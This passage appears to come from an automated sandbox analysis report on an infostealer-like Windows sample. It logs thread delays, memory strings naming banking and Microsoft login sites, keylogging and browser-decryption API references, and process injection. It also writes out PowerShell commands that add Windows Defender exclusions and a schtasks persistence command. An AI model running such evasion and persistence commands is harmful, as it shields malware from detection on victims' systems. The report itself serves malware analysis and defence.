Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 599651	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 599204	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 598968	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 598749	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 598630	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 598390	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 598280	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 598137	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 597882	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 597756	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 597640	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 597529	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 597395	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 596499	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 596059	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 595624	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 595076	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 594749	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 594421	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 594312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 599764
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 599438
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 599108
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 598891
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 598671
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 598563
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 598438
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 598313
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 598203
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 598094
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 597969
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 597360
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 597235
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 596985
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 596860
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 596735
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 596610
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 596360
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 596110
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 595985
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 595860
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 595735
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 595610
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 595485
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 595360
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 595235
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 595110
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 594985
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 594860
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 594735
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 594599
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 594469
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 594360
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 594235
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 594110

Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: ckHregxJIq.exe, 00000001.00000002.1316854630.0000000007880000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: agAuJ8ltVMCIOf31qe
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: ckHregxJIq.exe, 00000001.00000002.1316854630.0000000007880000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: Moh2uvNIhrMD87MeqTp499ojZ0uClGYarOWia3sDc6iIE5DoMgLhVnnV4DjUcygVBEuQl90cDX7pFgpsJijK6E6rHdONN5sODtAjIwDWtTGULZRMUE2Fj3XlcXb5N2UserControlSystem.Windows.Formsk3ZUjPa20Tik3jWV8kUITypeEditorSystem.Drawing.DesignSystem.DrawingNJvaftViZCrUawpPyDEnumfpTmbbA6mAHt3E4m7BhJDpVO7OkQKoukAkBDpJJpnbhNcqddPKB5GiW44NXrf2yC2IF9gssmMulticastDelegateh9IuwMLhwtWcBrgArvgWUdPE570duXOaTosPEw9kjYCckUlpsppOHDgiasUyystTG2A7WhKuRE4XX3uTiS5NWWiKliXxNhj0X9rYlaF5gNDMBiugBnBZWCFt7Ewm7wSm5vt4mfwLQW1GI9s3hcuTYXSqkwomMdsga5LAygLLTlJ3waMWnrOvesbnfMW4Mk2s0ycjObETNeRQMKXH8pIIdEjtwWuVkvn7B22TncsV9RIUS8PfJt4bUhXxOd3JjV2oSH3kSysCLngEqqtaN0cyeiCZwLqjAHTjNgmOKSFEu9yQIJsu7xPACCkMYGXppgoU3EMeNe348PbvtbyE6bKq8ssfWKvVRqcaYHgBoAcUagAuJ8ltVMCIOf31qeHB1KvCqepuAVmDoRkkosTPLD8geo6nK93sMtFQNciltNv6xTBg4mDnOa6Ics9ceFiUpsBSSNAwnTP8xASXn1LS9TElsykO9GUdcQc3uv1Gl6B9NspD0y77ytoQ73NUw9IHQIwKLhGAYielhDmc80r04br1raHZc02RTYXrCGo1jlbktWdEYCtA0wcJIu0fB0vDCBxQyPiPDkgXSNDJXOEU9uOU7hj56Il9kD8GGFs8EventArgsBFLkBEkukybo5Lqdv6ApplicationExceptionlOo23tKDyq8RMS9L0OcxeQw3G2l0Hu03P5VQLxCNonv9tgb7MgycvMrfnvmQEjkFlNZNo6Jlk2poIMQ64WqeCK4xGtfdTT72dOQV85E4pPehWQ8e1ROmWKFr3U75t8R5769LjfVZiEvqo41dFormVayqvEHaUQbcd8xW2dzv9XvurHRAfCNDMw3OTWVDqCskDMqZf5rRyjRandomu3dyRKzJYCE1BncR3WdG6YnBZ1m4opc2QNnBXExpandableObjectConverterSystem.ComponentModelcy90LWZZANC1R9g8UDHkIkj41ZNKTT1FjngbaZQsKlaUZiwJH928fJXh0mLUTdMZc5QsC1kdrm6l<Module>{F24F8E17-F53B-40E1-8D30-F436263EAB53}MkFTk1Zp1VPy5rmC0B4E4aJIoZDOaTiOqr6NBwdwWkfZZVLh8jcYt44mw<PrivateImplementationDetails>{2D7C28CA-46B4-49DC-B5F4-8C0A3073B189}__StaticArrayInitTypeSize=256__StaticArrayInitTypeSize=40__StaticArrayInitTypeSize=30__StaticArrayInitTypeSize=32__StaticArrayInitTypeSize=16__StaticArrayInitTypeSize=64__StaticArrayInitTypeSize=18
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3724508809.000000000126F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlldp
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: ckHregxJIq.exe, 0000000E.00000002.3724848711.0000000001346000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: aFAsiNcQRJEVeL.exe, 00000013.00000002.3734207961.00000000041D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\ckHregxJIq.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\ckHregxJIq.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe"
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe"
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\ckHregxJIq.exe

Memory written: C:\Users\user\Desktop\ckHregxJIq.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process created: C:\Users\user\Desktop\ckHregxJIq.exe "C:\Users\user\Desktop\ckHregxJIq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process created: C:\Users\user\Desktop\ckHregxJIq.exe "C:\Users\user\Desktop\ckHregxJIq.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpE071.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process created: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe "C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ckHregxJIq.exe	Queries volume information: C:\Users\user\Desktop\ckHregxJIq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
